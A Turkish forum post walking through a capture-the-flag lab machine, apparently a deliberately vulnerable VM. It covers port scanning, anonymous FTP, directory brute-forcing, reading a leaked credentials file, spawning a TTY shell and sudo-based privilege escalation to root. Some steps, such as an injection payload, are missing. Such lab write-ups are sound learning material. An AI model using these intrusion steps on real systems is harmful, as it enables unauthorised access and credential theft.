Daha sonra nmap(network mapping)(ağ haritalandırma) aracı yardımıyla çözeceğimiz makinenin IP’sindeki açık portları listeliyoruz.
Buradaki –p- parametresi aracın bütün portları (65535) taramasını sağlar.
nmap –p- IP_ADRESI
Kod:
nmap –p- 192.168.1.48
21 /TCP portunun açık olduğunu gördüğümüz için, sunucuya anonim olarak girmeyi deniyoruz.
Kod:
ftp 192.168.1.48
Kod:
anonymous
Giriş başarılı, şimdi de dizinde listeleme yapıyoruz.
Kod:
ls
Dosyaları okumak için indiriyoruz ve açıp okuyoruz.
İlkinin ‘creds’den kimlik bilgileri olduğunu düşünüp, ikincisi için makinenin portuna bakıyoruz.
Kod:
192.168.1.48/1337
Sürekli yenilediğimizde site yüklenir gibi oluyor. Ancak hata veriyor ve yazıyı okuyamıyoruz. Bu yüzden netcat ile ip’deki portu tarayalım.
Netcat nedir? Nasıl Kullanılır? (Netcat, ağı okuyan ve TCP veya UDP iletişim kurallarını kullanarak ağ bağlantılarını yazan bir hizmetidir. ncip_adresiport_numarası verilerek kullanılabilir.)
Kod:
nc 192.168.1.48 1337
Hediyesini vermek için basit matematik sorularını 1000 kere cevaplamamızı istiyor. Burada bizlere bir şey verip vermeyeceğini bilmediğimiz için 1000 kez cevaplamanın da zaman alacağı için bırakıyoruz.
Ayrıca portları bulduğumuz yerde service adının waste olduğunu görüyoruz. (waste: boşa harcamak)
Bulduğumuz portlar arasından diğerini gözden geçiriyoruz.
Kod:
192.168.1.48:7331
Tarayıcıdan porta baktığımızda bu sayfa karşımıza geliyor.
Sitenin kaynak kodlarınıda görüntüledik ancak kullanabileceğimiz bir bilgi edinemedik. Şimdi sitede gizli dizinler var mı gobuster aracı ile ona bakıyoruz.
Gobuster nedir? (Gobuster biz dizin keşfi yapan brute-force (kaba-kuvvet) saldırı programıdır.)
NOT: Gobuster’ınız yoksa aşağıdaki kodu yazarak yükleyebilirsiniz.
Kod:
sudo apt-get install gobuster
Gobuster’ı edindikten sonra taramaya başlıyoruz.
Kod:
gobuster dir -u http://192.168.1.48:7331 -w /usr/share/wordlists/dirb/big.txt
Buradaki base64 –d ise echo ile yazdırdığımız base64 kodunu, decode eder ve eski haline çevirir.
Ve bağlantı kuruyoruz.
Daha sonra aşağıdaki komutu yazarak dosyaları listeliyoruz.
Kod:
ls
Aşağıdaki komutu yazarak app.py dosyasını anlamlı bir şey var mı diye okuyoruz.
Kod:
cat app.py
Credentials(kimlik bilgileri)’ın bulunduğu dizinin yazdığını fark ediyoruz.
CREDS = "/home/nitish/.dev/creds.txt"
Dizini ve cat komutunu kullanarak txt dosyasını okuyoruz.
Kod:
cat /home/nitish/.dev/creds.txt
Bize böyle bir çıktı veriyor.
Kod:
nitish:p4ssw0rdStr3r0n9
Nitish olarak giriş yapmak için bir bash kabuğu çağırıyoruz ve onu yazacağımız phyton kodu ile TTY kabuğuna çeviriyoruz.
Kod:
bash
Kod:
python -c 'import pty;pty.spawn("/bin/sh")'
Daha sonra az önce nitish kullanıcısından elde ettiğimiz bilgileri giriyoruz.
Kod:
nitish
Kod:
p4ssw0rdStr3r0n9
Daha sonra nitish’inhome klasörüne giderek user.txt’yi okuyoruz.
Kod:
cd ..
Kod:
cd ..
Kod:
cd home/nitish
Kod:
ls
Kod:
cat user.txt
Çıktı: 10aay8289ptgguy1pvfa73alzusyyx3c=
Bize bu çıktıyı verdi, base64 kodu olduğunu anladıktan sonra decode ettik, pek anlamlı bulmadığım aşağıdaki çıktıyı verdi.
�F��ͼ��`�쵦���v���2��
Daha sonra biraz araştırdıktan sonra flag olarak bunu yapmışlar ve ilk bayrağımızı bulmuş olduk.
Şimdi ikinci bayrağı bulmak için işe koyuluyoruz, öncelikle kullanıcı izinlerini kontrol ediyoruz.
Kod:
su –l
Burada genie diye bir script oluşturulduğunu ve şifresiz olarak sam’in kullanılabildiğini görüyoruz.
Kod:
genie
Kod:
genie –h
Birazcık inceledikten sonra aşağıdaki komut ile sam kullanıcısına geçiyoruz.
Kod:
sudo -u sam genie -cmd new
whoami diyerek kim olduğumuza baktık ve sam kullanıcısındayız. Daha sonra izinlerini listeliyoruz.
Kod:
sudo –l
/root/lago da şifre olmadığını gördük ve giriş yapıyoruz.
Kod:
sudo –u root /root/lago
Buradaki –u user(kullanıcı)’ı belirtir. Root olarak root dizinindeki lago’yu çalıştırdık.
Daha sonra buradaki seçenekleri denemeye başladık.
2. seçeneği seçip num olarak sayıyı girdiğimizde root kullanıcısına erişmiş olduk.
Daha sonra root kullanıcısı olarak bir kabuk çalıştırıyoruz ve ana dizine gidiyoruz.
Kod:
bash
Kod:
su root
Kod:
cd
Daha sonra listeleme yapıyoruz ve proof.sh isimli scripti görüyoruz.
Kod:
ls
Aşağıdaki komutu yazarak scripti çalıştırıyoruz ve bayrağı bulduk.
Kod:
./proof.sh
Güzel bir makine çözümüydü, umarım beğenmişsinizdir.
“P4RS hocama makine çözümündeki yardımları için teşekkür ederim.
---------------------
Copyright decrypted
The Golden Ratio is a special number found by dividing a line into two parts so that the longer part divided by smaller part is also equal to the whole length divided by the longer part.
Konu PigGunner tarafından (01-02-2020 09:22 Saat 09:22 ) değiştirilmiştir.
Elinize sağlık. Birgün linuxa geçersem buradan faydalanıcağım
Cevabınız konu ile pek bağlantılı gelmese de teşekkür ederim.
İyi forumlar..
---------------------
Copyright decrypted
The Golden Ratio is a special number found by dividing a line into two parts so that the longer part divided by smaller part is also equal to the whole length divided by the longer part.
The Golden Ratio is a special number found by dividing a line into two parts so that the longer part divided by smaller part is also equal to the whole length divided by the longer part.
The Golden Ratio is a special number found by dividing a line into two parts so that the longer part divided by smaller part is also equal to the whole length divided by the longer part.